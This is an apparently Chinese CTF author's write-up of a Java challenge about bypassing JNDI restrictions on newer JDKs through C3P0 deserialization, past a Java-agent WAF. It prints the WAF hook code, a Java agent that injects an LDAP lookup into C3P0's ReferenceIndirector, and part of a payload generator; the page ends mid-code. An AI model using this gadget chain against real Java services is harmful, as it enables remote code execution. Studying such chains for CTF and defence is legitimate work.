<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="节分端午自谁言，万古传闻为屈原。堪笑楚江空渺渺，不能洗得直臣冤。 首先祝大家端午节安康 0x00 题为话前段时间dest0g3 新生赛中受颜老板邀请出一个jndi相关的题目，当时想了想目前jndi这个知识点网上基本上弄的比较透彻，所有肯定是要出bypass 8u191的jndi。其中的浅蓝师傅的探索高版本 JDK 下 JNDI 漏洞的利用方法非常精彩，为了出题自己重新去看了一遍并且尝试挖掘其他的g">
<meta property="og:type" content="article">
<meta property="og:title" content="ljctr wp">
<meta property="og:url" content="http://example.com/2022/06/04/ljctr-wp/index.html">
<meta property="og:site_name" content="一往无前虎山行">
<meta property="og:description" content="节分端午自谁言，万古传闻为屈原。堪笑楚江空渺渺，不能洗得直臣冤。 首先祝大家端午节安康 0x00 题为话前段时间dest0g3 新生赛中受颜老板邀请出一个jndi相关的题目，当时想了想目前jndi这个知识点网上基本上弄的比较透彻，所有肯定是要出bypass 8u191的jndi。其中的浅蓝师傅的探索高版本 JDK 下 JNDI 漏洞的利用方法非常精彩，为了出题自己重新去看了一遍并且尝试挖掘其他的g">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s1.ax1x.com/2022/06/04/Xa4OGq.md.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/06/04/Xa4bIs.md.png">
<meta property="article:published_time" content="2022-06-04T05:22:57.020Z">
<meta property="article:modified_time" content="2022-06-04T05:28:01.661Z">
<meta property="article:author" content="Firebasky">
<meta property="article:tag" content="java">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s1.ax1x.com/2022/06/04/Xa4OGq.md.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>ljctr wp</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.1.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="القائمة"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="القائمة"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="الأعلى" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://erroratao.github.io/">项目</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2023/01/18/Solve-the-problem-of-iiop-using-net-network-in-webLogic/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2022/05/24/Trick-for-bypass-waf/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2022/06/04/ljctr-wp/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2022/06/04/ljctr-wp/&text=ljctr wp"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2022/06/04/ljctr-wp/&title=ljctr wp"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2022/06/04/ljctr-wp/&is_video=false&description=ljctr wp"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=ljctr wp&body=Check out this article: http://example.com/2022/06/04/ljctr-wp/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2022/06/04/ljctr-wp/&title=ljctr wp"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2022/06/04/ljctr-wp/&title=ljctr wp"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2022/06/04/ljctr-wp/&title=ljctr wp"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2022/06/04/ljctr-wp/&title=ljctr wp"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2022/06/04/ljctr-wp/&name=ljctr wp&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2022/06/04/ljctr-wp/&t=ljctr wp"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-%E9%A2%98%E4%B8%BA%E8%AF%9D"><span class="toc-number">1.</span> <span class="toc-text">0x00 题为话</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E9%A2%98%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA%E4%BB%8B%E7%BB%8D"><span class="toc-number">2.</span> <span class="toc-text">0x01 题环境搭建介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E5%88%86%E6%9E%90%E9%A2%98%E7%9B%AE"><span class="toc-number">3.</span> <span class="toc-text">0x02 分析题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-poc"><span class="toc-number">4.</span> <span class="toc-text">0x03 poc</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#jndi-poc"><span class="toc-number">4.1.</span> <span class="toc-text">jndi poc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#yaml-load-poc"><span class="toc-number">4.2.</span> <span class="toc-text">yaml load poc</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E6%80%BB%E7%BB%93"><span class="toc-number">5.</span> <span class="toc-text">0x04 总结</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        ljctr wp
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Firebasky</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-06-04T05:22:57.020Z" itemprop="datePublished">2022-06-04</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/ctf/" rel="tag">ctf</a>, <a class="tag-link-link" href="/tags/java/" rel="tag">java</a>, <a class="tag-link-link" href="/tags/wp/" rel="tag">wp</a>
    </div>


	  
    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>节分端午自谁言，万古传闻为屈原。堪笑楚江空渺渺，不能洗得直臣冤。</p>
<p>首先祝大家端午节安康</p>
<h2 id="0x00-题为话"><a href="#0x00-题为话" class="headerlink" title="0x00 题为话"></a>0x00 题为话</h2><p>前段时间dest0g3 新生赛中受颜老板邀请出一个jndi相关的题目，当时想了想目前jndi这个知识点网上基本上弄的比较透彻，所有肯定是要出bypass 8u191的jndi。其中的浅蓝师傅的<a target="_blank" rel="noopener" href="https://tttang.com/archive/1405/">探索高版本 JDK 下 JNDI 漏洞的利用方法</a>非常精彩，为了出题自己重新去看了一遍并且尝试挖掘其他的gadgets(挖了一些没公开)，先说说目前自己出ctf题的想法吧，(自认为)基本上是出和真实环境相关的题。并且基本上说给源代码的因为自己不喜欢猜来猜去的。回到题目构造的思路上，当时自己去寻找了一些没有tomcat的中间件去搭建题目环境并且寻找<strong>Factory</strong>去利用构造发现工作量有点小大(太懒了)就没有去弄了，就简简单单的弄了一个springboot的环境内含tomcat，然后前面的话就弄一个简简单单的反序列化去触发jndi 的gadgets 交差！</p>
<h2 id="0x01-题环境搭建介绍"><a href="#0x01-题环境搭建介绍" class="headerlink" title="0x01 题环境搭建介绍"></a>0x01 题环境搭建介绍</h2><p>这里自己选的是C3P0链，一方面是比较简单，另一方面是真实基本上比较常见至少有一定的价值。C3P0存在的链子有http连接加载执行和不出网的<strong>Factory</strong>利用(见<a target="_blank" rel="noopener" href="https://www.yulegeyu.com/2021/10/10/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8BC3P0%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/">JAVA反序列化之C3P0不出网利用</a>)，这里肯定不能用现成的gadgets去打，并且也不能使用网上的bypass jndi工具去执行el表达式这些绕过。所有加入了java agent技术。既然说到这里了就简单的介绍一下java agent的使用场景 1. agent内存马 2.可以修改源代码起等防御的作用(本质上差不多是rasp) 等等。在防御的时候我选择了运行中防御，也就是为什么题目附件里面有一个<strong>需要进入docker 执行java -jar waf.jar</strong> </p>
<p>噢对了 jdk环境肯定是大于8u191的</p>
<h2 id="0x02-分析题目"><a href="#0x02-分析题目" class="headerlink" title="0x02 分析题目"></a>0x02 分析题目</h2><p>题目非常简单就一个反序列化入口点不能存在ldap的字符串（自己感觉处理的不好，因为可能存在绕过然后就出现其他问题比如ldap打反序列化返回数据执行原来的c3p0 gadgets rce)，有经验的看到这里就已经猜到了使用rmi 的<strong>Factory</strong>去绕过。并且存在 C3p0的依赖。那思路就清楚了。通过反序列化C3P0去jndi然后执行命令rce。</p>
<p>前几天有师傅说使用yso的就可以打通，那说明我的waf.jar没有配置好。。自己的问题不好意思</p>
<p>那我们看看waf.jar里面是啥</p>
<p>main方法里面其实就是去选择名为DemoApplication的程序去获得pid,之后进行hook,核心内容在simpleDemo0 和simpleDemo1。这里说一个就可以了因为代码差不多一样</p>
<p>simpleDemo0 中对<strong>org&#x2F;apache&#x2F;tomcat&#x2F;util&#x2F;net&#x2F;SocketBufferHandler</strong>类进行hook</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="string">&quot;org/apache/tomcat/util/net/SocketBufferHandler&quot;</span>.equals(className)) &#123;</span><br><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">AgentDemo.el(inst, loader);</span><br><span class="line">&#125; <span class="keyword">catch</span> (Exception var7) &#123;</span><br><span class="line">var7.printStackTrace();</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>并且执行<strong>AgentDemo.el(inst, loader);</strong></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] el(Instrumentation inst, ClassLoader loader) <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        Class&lt;?&gt; elProcessorClass = Class.forName(<span class="string">&quot;javax.el.ELProcessor&quot;</span>, <span class="literal">true</span>, loader);</span><br><span class="line">        <span class="type">ClassPool</span> <span class="variable">classPool</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ClassPool</span>(<span class="literal">true</span>);</span><br><span class="line">        classPool.insertClassPath(<span class="keyword">new</span> <span class="title class_">ClassClassPath</span>(elProcessorClass));</span><br><span class="line">        classPool.insertClassPath(<span class="keyword">new</span> <span class="title class_">LoaderClassPath</span>(elProcessorClass.getClassLoader()));</span><br><span class="line">        <span class="type">CtClass</span> <span class="variable">ctClass</span> <span class="operator">=</span> classPool.get(elProcessorClass.getName());</span><br><span class="line">        <span class="type">CtMethod</span> <span class="variable">ctMethod</span> <span class="operator">=</span> ctClass.getMethod(<span class="string">&quot;eval&quot;</span>, <span class="string">&quot;(Ljava/lang/String;)Ljava/lang/Object;&quot;</span>);</span><br><span class="line">        ctMethod.insertBefore(String.format(<span class="string">&quot; if (expression!=null)&#123;\n            return null;\n        &#125;&quot;</span>, AgentDemo.class.getName()));</span><br><span class="line">        inst.redefineClasses(<span class="keyword">new</span> <span class="title class_">ClassDefinition</span>[]&#123;<span class="keyword">new</span> <span class="title class_">ClassDefinition</span>(elProcessorClass, ctClass.toBytecode())&#125;);</span><br><span class="line">        ctClass.detach();</span><br><span class="line">        <span class="keyword">return</span> ctClass.toBytecode();</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>可以看到这里使用了javassist技术去修改eval方法里面的逻辑，也就是如果expression!&#x3D;null就直接return null;</p>
<p>为什么这样呢，因为通过el表达式执行 expression肯定不为null,所有相当于起得了防御的作用。simpleDemo1同理</p>
<p>然后知道了题目不能使用el表达式去执行，并且c3p0 gadgets中 reference不能有值。这里不分析C3P0已经存在的gadgets，网上有很多。。。</p>
<p>现在的问题就是在C3P0中选择jndi的gadgets,其实非常简单。</p>
<p>在 <strong>com.mchange.v2.naming.ReferenceIndirector.ReferenceSerialized#getObject</strong>中已经有了lookup方法</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/Xa4OGq"><img src="https://s1.ax1x.com/2022/06/04/Xa4OGq.md.png" alt="Xa4OGq.md.png"></a></p>
<p>满足条件就可以jndi了，具体的细节大家自己分析噢。我这里只是说一下主要的问题就是正常的反序列化<strong>contextName</strong>变量为null的问题。为什么是这样勒因为在 <strong>com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#writeObject</strong>中进行了实例化操作</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">oos.writeObject(indirector.indirectForm(this.connectionPoolDataSource));</span><br></pre></td></tr></table></figure>

<p>所有我们要解决这个问题。我这里想到的方法有3个</p>
<ol>
<li><p>修改C3P0源代码 比较简单</p>
</li>
<li><p>通过agent技术去修改源代码</p>
</li>
<li><p>像jre8u20 gadgets一样去操作反序列化的字节码（有点麻烦 理论上肯定可以）</p>
</li>
</ol>
<p>有其他方法欢迎讨论</p>
<p>现在jndi的问题解决了，那rce怎么办呢？ 我们看看springboot中本身存在什么依赖</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/Xa4bIs"><img src="https://s1.ax1x.com/2022/06/04/Xa4bIs.md.png" alt="Xa4bIs.md.png"></a></p>
<p>有一个yaml 那非常好 浅蓝师傅的<a target="_blank" rel="noopener" href="https://tttang.com/archive/1405/">探索高版本 JDK 下 JNDI 漏洞的利用方法</a>里面说到了这个利用方法直接拿来用就可以了。</p>
<p>有师傅用了xxe去读文件（也可以接受至少是这个方向上的利用</p>
<h2 id="0x03-poc"><a href="#0x03-poc" class="headerlink" title="0x03 poc"></a>0x03 poc</h2><h3 id="jndi-poc"><a href="#jndi-poc" class="headerlink" title="jndi poc"></a>jndi poc</h3><p>如下代码就是我使用agent技术去实现的</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.sun.tools.attach.VirtualMachine;</span><br><span class="line"><span class="keyword">import</span> com.sun.tools.attach.VirtualMachineDescriptor;</span><br><span class="line"><span class="keyword">import</span> javassist.*;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.File;</span><br><span class="line"><span class="keyword">import</span> java.io.UnsupportedEncodingException;</span><br><span class="line"><span class="keyword">import</span> java.lang.instrument.ClassDefinition;</span><br><span class="line"><span class="keyword">import</span> java.lang.instrument.Instrumentation;</span><br><span class="line"><span class="keyword">import</span> java.net.URLDecoder;</span><br><span class="line"><span class="keyword">import</span> java.util.List;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">AgentDemo</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Throwable&#123;</span><br><span class="line">        Class.forName(<span class="string">&quot;sun.tools.attach.HotSpotAttachProvider&quot;</span>);</span><br><span class="line">        List&lt;VirtualMachineDescriptor&gt; vms = VirtualMachine.list();</span><br><span class="line">        <span class="type">String</span> <span class="variable">targetPid</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; vms.size(); i++) &#123;</span><br><span class="line">            <span class="type">VirtualMachineDescriptor</span> <span class="variable">vm</span> <span class="operator">=</span> vms.get(i);</span><br><span class="line">            <span class="keyword">if</span> (vm.displayName().contains(<span class="string">&quot;main&quot;</span>)) &#123;</span><br><span class="line">                System.out.println(vm.displayName());</span><br><span class="line">                targetPid = vm.id();</span><br><span class="line">                System.out.println(targetPid);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="type">VirtualMachine</span> <span class="variable">virtualMachine</span> <span class="operator">=</span> VirtualMachine.attach(targetPid);</span><br><span class="line">        virtualMachine.loadAgent(getJarFileByClass(AgentDemo.class),<span class="literal">null</span>);</span><br><span class="line">        virtualMachine.detach();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> String <span class="title function_">getJarFileByClass</span><span class="params">(Class cs)</span> &#123;</span><br><span class="line">        String fileString=<span class="literal">null</span>;</span><br><span class="line">        String tmpString;</span><br><span class="line">        <span class="keyword">if</span> (cs!=<span class="literal">null</span>) &#123;</span><br><span class="line">            tmpString=cs.getProtectionDomain().getCodeSource().getLocation().getFile();</span><br><span class="line">            <span class="keyword">if</span> (tmpString.endsWith(<span class="string">&quot;.jar&quot;</span>)) &#123;</span><br><span class="line">                <span class="keyword">try</span> &#123;</span><br><span class="line">                    fileString= URLDecoder.decode(tmpString,<span class="string">&quot;utf-8&quot;</span>);</span><br><span class="line">                &#125; <span class="keyword">catch</span> (UnsupportedEncodingException e) &#123;</span><br><span class="line">                    fileString=URLDecoder.decode(tmpString);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">new</span> <span class="title class_">File</span>(fileString).toString();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">agentmain</span><span class="params">(String agentOps, Instrumentation inst)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="keyword">for</span> (Class allLoadedClass : inst.getAllLoadedClasses()) &#123;</span><br><span class="line">            <span class="keyword">if</span> (allLoadedClass.getName().contains(<span class="string">&quot;c3p0.main&quot;</span>)) &#123;</span><br><span class="line">                Class&lt;?&gt; elProcessorClass = Class.forName(<span class="string">&quot;com.mchange.v2.naming.ReferenceIndirector&quot;</span>);</span><br><span class="line">                <span class="type">ClassPool</span> <span class="variable">classPool</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ClassPool</span>(<span class="literal">true</span>);</span><br><span class="line">                classPool.insertClassPath(<span class="keyword">new</span> <span class="title class_">ClassClassPath</span>(elProcessorClass));</span><br><span class="line">                classPool.insertClassPath(<span class="keyword">new</span> <span class="title class_">LoaderClassPath</span>(elProcessorClass.getClassLoader()));</span><br><span class="line">                <span class="type">CtClass</span> <span class="variable">ctClass</span> <span class="operator">=</span> classPool.get(elProcessorClass.getName());</span><br><span class="line">                <span class="type">CtMethod</span> <span class="variable">ctMethod</span> <span class="operator">=</span> ctClass.getMethod(<span class="string">&quot;indirectForm&quot;</span>,<span class="string">&quot;(Ljava/lang/Object;)Lcom/mchange/v2/ser/IndirectlySerialized;&quot;</span>);</span><br><span class="line">                ctMethod.insertBefore(String.format(<span class="string">&quot;java.util.Properties properties = new java.util.Properties();\n&quot;</span> +</span><br><span class="line">                        <span class="string">&quot;        javax.naming.CompoundName compoundName = new javax.naming.CompoundName(\&quot;ldap://127.0.0.1:6666/calc\&quot;,properties);&quot;</span> +</span><br><span class="line">                        <span class="string">&quot;contextName=compoundName;&quot;</span>,AgentDemo.class.getName()));</span><br><span class="line">                inst.redefineClasses(<span class="keyword">new</span> <span class="title class_">ClassDefinition</span>(elProcessorClass,ctClass.toBytecode()));</span><br><span class="line">                ctClass.detach();</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>生成jar之后run下面代码就可以成功生exp</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> c3p0;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.mchange.v2.c3p0.PoolBackedDataSource;</span><br><span class="line"><span class="keyword">import</span> com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;</span><br><span class="line"><span class="keyword">import</span> com.mchange.v2.naming.ReferenceIndirector;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.naming.*;</span><br><span class="line"><span class="keyword">import</span> javax.sql.ConnectionPoolDataSource;</span><br><span class="line"><span class="keyword">import</span> javax.sql.PooledConnection;</span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.sql.SQLException;</span><br><span class="line"><span class="keyword">import</span> java.sql.SQLFeatureNotSupportedException;</span><br><span class="line"><span class="keyword">import</span> java.util.Base64;</span><br><span class="line"><span class="keyword">import</span> java.util.Properties;</span><br><span class="line"><span class="keyword">import</span> java.util.logging.Logger;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">main</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        Thread.sleep(<span class="number">5000</span>);<span class="comment">//sleep一会</span></span><br><span class="line">        <span class="type">PoolBackedDataSource</span> <span class="variable">b</span> <span class="operator">=</span> Reflections.createWithoutConstructor(PoolBackedDataSource.class);</span><br><span class="line">        Reflections.getField(PoolBackedDataSourceBase.class, <span class="string">&quot;connectionPoolDataSource&quot;</span>).set(b, <span class="keyword">new</span> <span class="title class_">PoolSource</span>());</span><br><span class="line">        writeFile(<span class="string">&quot;2.txt&quot;</span>,serialize(b));</span><br><span class="line">        <span class="comment">//deserialize(FiletoBytes(&quot;1.txt&quot;));</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="keyword">class</span> <span class="title class_">PoolSource</span> <span class="keyword">extends</span> <span class="title class_">ReferenceIndirector</span> <span class="keyword">implements</span> <span class="title class_">ConnectionPoolDataSource</span>, Referenceable &#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="title function_">PoolSource</span> <span class="params">()</span> &#123;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> Reference <span class="title function_">getReference</span> <span class="params">()</span> <span class="keyword">throws</span> NamingException &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> PrintWriter <span class="title function_">getLogWriter</span> <span class="params">()</span> <span class="keyword">throws</span> SQLException &#123;<span class="keyword">return</span> <span class="literal">null</span>;&#125;</span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setLogWriter</span> <span class="params">( PrintWriter out )</span> <span class="keyword">throws</span> SQLException &#123;&#125;</span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setLoginTimeout</span> <span class="params">( <span class="type">int</span> seconds )</span> <span class="keyword">throws</span> SQLException &#123;&#125;</span><br><span class="line">        <span class="keyword">public</span> <span class="type">int</span> <span class="title function_">getLoginTimeout</span> <span class="params">()</span> <span class="keyword">throws</span> SQLException &#123;<span class="keyword">return</span> <span class="number">0</span>;&#125;</span><br><span class="line">        <span class="keyword">public</span> Logger <span class="title function_">getParentLogger</span> <span class="params">()</span> <span class="keyword">throws</span> SQLFeatureNotSupportedException &#123;<span class="keyword">return</span> <span class="literal">null</span>;&#125;</span><br><span class="line">        <span class="keyword">public</span> PooledConnection <span class="title function_">getPooledConnection</span> <span class="params">()</span> <span class="keyword">throws</span> SQLException &#123;<span class="keyword">return</span> <span 